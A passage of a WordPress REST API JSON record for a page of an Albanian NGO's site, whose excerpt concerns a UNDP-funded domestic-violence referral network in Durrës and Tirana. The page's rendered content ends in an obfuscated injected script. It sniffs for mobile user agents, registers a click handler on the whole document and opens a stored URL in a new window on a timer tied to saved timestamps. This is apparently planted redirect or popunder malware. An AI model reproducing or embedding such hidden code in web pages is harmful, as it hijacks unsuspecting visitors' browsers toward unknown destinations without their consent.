|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rrjeti i Reagimit te Koordinuar Kund\u00ebr Dhun\u00ebs n\u00eb Durr\u00ebs dhe Tiran\u00eb Qendra p\u00ebr Zhvillim Komunitar &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb nj\u00eb nga organizatat e para q\u00eb u b\u00eb pjes\u00eb e Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare, t\u00eb financuar ga UNDP-ja, dhe mb\u00ebshtetur nga Bashkia e Durr\u00ebsit, e cila ka p\u00ebr q\u00ebllim<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/33"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=33"}],"version-history":[{"count":20,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/33\/revisions"}],"predecessor-version":[{"id":3093,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/33\/revisions\/3093"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=33"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}